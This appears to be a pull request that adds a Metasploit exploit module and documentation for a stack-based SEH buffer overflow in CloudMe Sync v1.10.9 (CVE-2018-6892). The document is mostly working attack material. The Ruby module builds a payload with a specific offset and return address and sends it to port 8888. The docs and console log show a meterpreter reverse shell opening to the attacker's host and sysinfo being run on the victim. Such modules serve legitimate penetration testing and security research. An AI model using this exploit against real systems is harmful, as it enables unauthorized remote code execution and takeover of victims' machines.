### PR TITLE
CloudMe Sync v1.10.9 Buffer Overflow

### DIFF
--- a/documentation/modules/exploit/windows/misc/cloudme_sync.md
+++ b/documentation/modules/exploit/windows/misc/cloudme_sync.md
@@ -1,0 +1,66 @@
+
+## Verification Steps
+    1. Install CloudMe for Desktop version `v1.10.9`
+  2. Create a free account and start the applicaton
+  6. Start `msfconsole`
+    4. Do `use exploit/windows/misc/cloudme_sync`
+    5. Do `set RHOST ip`
+  11. Do `set PAYLOAD windows/meterpreter/reverse_tcp`
+  12. Do `set LHOST ip`
+  13. Do `exploit`
+  14. Verify the Meterpreter session is opened
+
+## Scenarios
+
+### CloudMe Sync client application on Windows 7 SP1
+
+```
+msf > use exploit/windows/misc/cloudme_sync 
+msf exploit(windows/misc/cloudme_sync) > show options 
+
+Module options (exploit/windows/misc/cloudme_sync):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   RHOST  172.16.40.148    yes       The target address
+   RPORT  8888             yes       The target port (TCP)
+
+
+Payload options (windows/meterpreter/reverse_tcp):
+
+   Name      Current Setting  Required  Description
+   ----      ---------------  --------  -----------
+   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
+   LHOST     172.16.40.5      yes       The listen address
+   LPORT     4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   CloudMe Sync v1.10.9
+
+
+msf exploit(windows/misc/cloudme_sync) > set RHOST 172.16.40.148
+RHOST => 172.16.40.148
+msf exploit(windows/misc/cloudme_sync) > set PAYLOAD windows/meterpreter/reverse_tcp
+PAYLOAD => windows/meterpreter/reverse_tcp
+msf exploit(windows/misc/cloudme_sync) > set LHOST 172.16.40.5 
+LHOST => 172.16.40.5
+msf exploit(windows/misc/cloudme_sync) > exploit 
+
+[*] Started reverse TCP handler on 172.16.40.5:4444 
+[*] Sending stage (179779 bytes) to 172.16.40.148
+[*] Meterpreter session 1 opened (172.16.40.5:4444 -> 172.16.40.148:57185) at 2018-02-19 12:35:21 +0000
+
+meterpreter > sysinfo 
+Computer        : PC
+OS              : Windows 7 (Build 7601, Service Pack 1).
+Architecture    : x86
+System Language : pt_PT
+Domain          : WORKGROUP
+Logged On Users : 1
+Meterpreter     : x86/windows
+meterpreter >
+```

--- a/documentation/modules/exploit/windows/misc/cloudme_sync.md
+++ b/documentation/modules/exploit/windows/misc/cloudme_sync.md
@@ -1,10 +1,10 @@
 
 ## Verification Steps
-    1. Install CloudMe for Desktop version `v1.10.9`
+  1. Install CloudMe for Desktop version `v1.10.9`
   2. Create a free account and start the applicaton
   6. Start `msfconsole`
-    4. Do `use exploit/windows/misc/cloudme_sync`
-    5. Do `set RHOST ip`
+  4. Do `use exploit/windows/misc/cloudme_sync`
+  5. Do `set RHOST ip`
   11. Do `set PAYLOAD windows/meterpreter/reverse_tcp`
   12. Do `set LHOST ip`
   13. Do `exploit`

--- a/modules/exploits/windows/misc/cloudme_sync.rb
+++ b/modules/exploits/windows/misc/cloudme_sync.rb
@@ -1,0 +1,69 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = GreatRanking
+
+  include Msf::Exploit::Remote::Tcp
+  include Msf::Exploit::Remote::Seh
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'CloudMe Sync v1.10.9',
+      'Description'    => %q{
+        This module exploits a stack-based buffer overflow vulnerability
+        in CloudMe Sync v1.10.9 client application. This module has been
+        tested successfully on Windows 7 SP1 x86.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'hyp3rlinx',      # Original exploit author
+          'Daniel Teixeira' # MSF module author
+        ],
+      'References'     =>
+        [
+          [ 'CVE', '2018-6892'],
+          [ 'EDB', '44027' ],
+        ],
+      'DefaultOptions' =>
+        {
+          'EXITFUNC' => 'thread'
+        },
+      'Platform'       => 'win',
+      'Payload'        =>
+        {
+          'BadChars'   => "\x00",
+        },
+      'Targets'        =>
+        [
+          [ 'CloudMe Sync v1.10.9',
+            {
+              'Offset' => 2232,
+              'Ret'    => 0x61e7b7f6
+            }
+          ]
+        ],
+      'Privileged'     => true,
+      'DisclosureDate' => 'Jan 17 2018',
+      'DefaultTarget'  => 0))
+
+    register_options([Opt::RPORT(8888)])
+
+  end
+
+  def exploit
+    connect
+
+    buffer = make_nops(target['Offset'])
+    buffer << generate_seh_record(target.ret)
+    buffer << make_nops(10)
+    buffer << payload.encoded
+    buffer << make_nops(5600)
+
+    sock.put(buffer)
+    handler
+  end
+end


### PR DESCRIPTION
This PR adds a module to exploit a buffer overflow in CloudMe Sync Client v1.10.9.

- [x] Install the application
- [x] Start `msfconsole`
- [x] `exploit/windows/misc/cloudme_sync`
- [x] `set RHOST`
- [x] `set PAYLOAD windows/meterpreter/reverse_tcp`
- [x] `set LHOST`
- [x] Run